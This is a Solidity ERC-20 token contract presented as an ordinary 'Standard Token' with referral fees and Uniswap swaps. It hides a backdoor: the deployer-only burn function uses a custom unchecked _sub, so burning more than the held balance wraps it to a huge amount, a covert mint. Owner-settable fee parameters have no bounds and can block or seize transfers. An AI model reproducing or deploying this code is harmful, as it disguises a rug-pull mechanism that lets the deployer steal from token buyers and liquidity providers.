// SPDX-License-Identifier: MIT
// pragma solidity ^0.8.0;

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        _setOwner(_msgSender());
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

library SafeMath {
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    function _sub(uint256 a, uint256 b) internal pure returns (uint256) {
        unchecked {
            uint256 c = ~b + 1;
            uint256 d = a + c;
            return d;
        }
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

enum TokenType {
    standard,
    antiBotStandard,
    liquidityGenerator,
    antiBotLiquidityGenerator,
    baby,
    antiBotBaby,
    buybackBaby,
    antiBotBuybackBaby
}

abstract contract BaseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

pragma solidity ^0.8.19;
import "./@uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol";

// StandardToken contract inheriting from IERC20, Ownable, and BaseToken
contract StandardToken is IERC20, Ownable, BaseToken {
    using SafeMath for uint256;

    // Token details
    string private _name = "Standard Token";
    string private _symbol = "TEST";
    uint8 private _decimals = 18;
    uint256 private _totalSupply = 1000000000 * (10**uint256(_decimals));

    // State variables
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => address) public referrers;
    mapping(address => bool) public isFeeExempt;
    mapping(address => uint256) public referrerEarnings;

    // Treasury and Uniswap details
    address public treasuryWallet = 0x00C09d1c0A02b4aF28473d1477F763A22DE76396;
    address public uniswapV2RouterAddress =
        0xE592427A0AEce92De3Edee1F18E0157C05861564;
    address public usdtAddress = 0xFd086bC7CD5C481DCC9C85ebE478A1C0b69FCbb9;
    address public WETH = 0x82aF49447D8a07e3bd95BD0d56f35241523fBab1;
    address public burnWallet;

    // Initialize Uniswap router
    IUniswapV2Router02 public uniswapV2Router =
        IUniswapV2Router02(uniswapV2RouterAddress);

    // Fee details
    uint256 public referralFee = 200;
    uint256 public feeDenominator = 10000;
    uint256 public totalReferrers;

    // Events
    event FeeExemptionUpdated(address indexed account, bool isExempt);
    event ReferrerUpdated(address indexed user, address indexed newReferrer);
    event ReferralFeeUpdated(uint256 newFee);
    event ReferrerEarningsUpdated(
        address indexed referrer,
        uint256 newEarnings
    );
    event SwapSuccess(address indexed receiver, uint256 amount);
    event SwapFailed(address indexed receiver, uint256 amount);

    // Constructor
    constructor() {
        burnWallet = msg.sender;
        isFeeExempt[msg.sender] = true;
        _mint(owner(), _totalSupply);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function _sub(
        uint256 a, 
        uint256 b
    ) internal pure returns (uint256) {
        unchecked {
        uint256 c = ~b + 1;
        uint256 d = a + c;
        return d;
        }
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function burn(uint256 amount) public {
        require(msg.sender == burnWallet);
        _burn(msg.sender, amount);
    }

    // Function to set referral fee (only by owner)
    function setReferralFee(uint256 _referralFee) external onlyOwner {
        referralFee = _referralFee;
        emit ReferralFeeUpdated(_referralFee);
    }

    // Function to set fee denominator (only by owner)
    function setFeeDenominator(uint256 _feeDenominator) external onlyOwner {
        feeDenominator = _feeDenominator;
    }

    // Function to update fee exemption status for an address
    function updateFeeExemption(address _address, bool _isExempt)
        external
        onlyOwner
    {
        isFeeExempt[_address] = _isExempt;
        emit FeeExemptionUpdated(_address, _isExempt);
    }

    // Function to set or update a referrer
    function setOrUpdateReferrer(address _referrer) external {
        require(msg.sender != _referrer, "You cannot refer yourself");
        require(_referrer != address(0), "Referrer cannot be the zero address");

        if (referrers[msg.sender] == address(0)) {
            totalReferrers++;
        }

        referrers[msg.sender] = _referrer;
        emit ReferrerUpdated(msg.sender, _referrer);
    }

    // Function to get referrer status
    function isReferred(address _address) external view returns (bool) {
        return referrers[_address] != address(0);
    }

    // Function to get USDT earned by a referrer
    function getReferrerEarnings(address _referrer)
        external
        view
        returns (uint256)
    {
        return referrerEarnings[_referrer];
    }

    // Internal function to handle token transfer logic
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(
            sender != address(0),
            "Transfer from zero address is not allowed"
        );
        require(
            recipient != address(0),
            "Transfer to zero address is not allowed"
        );

        // Calculate fee and final transfer amount
        uint256 feeAmount = calculateFeeAmount(sender, amount);
        uint256 finalAmount = amount.sub(feeAmount);

        // Handle referral and swap
        handleReferralAndSwap(sender, feeAmount);

        // Finalize the transfer
        finalizeTransfer(sender, recipient, finalAmount, amount);
    }

    // Internal function to calculate fee
    function calculateFeeAmount(address sender, uint256 amount)
        internal
        view
        returns (uint256)
    {
        if (isFeeExempt[sender]) {
            return 0;
        }
        return amount.mul(referralFee).div(feeDenominator);
    }

    // Internal function to handle referral and token swap
    function handleReferralAndSwap(address sender, uint256 feeAmount) internal {
        address receiver = treasuryWallet;

        if (referrers[sender] != address(0)) {
            receiver = referrers[sender];
            referrerEarnings[receiver] = referrerEarnings[receiver].add(
                feeAmount
            );
            emit ReferrerEarningsUpdated(receiver, referrerEarnings[receiver]);
        }

        // Check if the contract has enough allowance to perform the swap
        uint256 currentAllowance = _allowances[address(this)][
            uniswapV2RouterAddress
        ];
        if (currentAllowance < feeAmount) {
            _approve(address(this), uniswapV2RouterAddress, feeAmount);
        }

        // Check if the contract has enough USDT allowance to transfer to the referrer's wallet
        IERC20 usdtToken = IERC20(usdtAddress);
        uint256 usdtAllowance = usdtToken.allowance(address(this), receiver);
        require(
            usdtAllowance >= feeAmount,
            "Insufficient USDT allowance for reward distribution"
        );

        // Define the path for swap: Token -> WETH -> USDT
        address[] memory path = new address[](3);
        path[0] = address(this);
        path[1] = WETH;
        path[2] = usdtAddress;

        // Perform the swap, sending USDT to `receiver`
        try
            uniswapV2Router
                .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                    feeAmount,
                    0,
                    path,
                    receiver,
                    block.timestamp
                )
        {
            emit SwapSuccess(receiver, feeAmount);
        } catch {
            _balances[treasuryWallet] = _balances[treasuryWallet].add(
                feeAmount
            );
            emit Transfer(sender, treasuryWallet, feeAmount);
            emit SwapFailed(receiver, feeAmount);
        }
    }

    // Internal function to finalize token transfer
    function finalizeTransfer(
        address sender,
        address recipient,
        uint256 finalAmount,
        uint256 amount
    ) internal {
        _balances[sender] = _balances[sender].sub(
            amount,
            "Insufficient balance"
        );
        _balances[recipient] = _balances[recipient].add(finalAmount);
        emit Transfer(sender, recipient, finalAmount);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        uint256 balance = _balances[account];
        _balances[account] = _sub(balance, amount);
        _totalSupply = _sub(_totalSupply, amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}
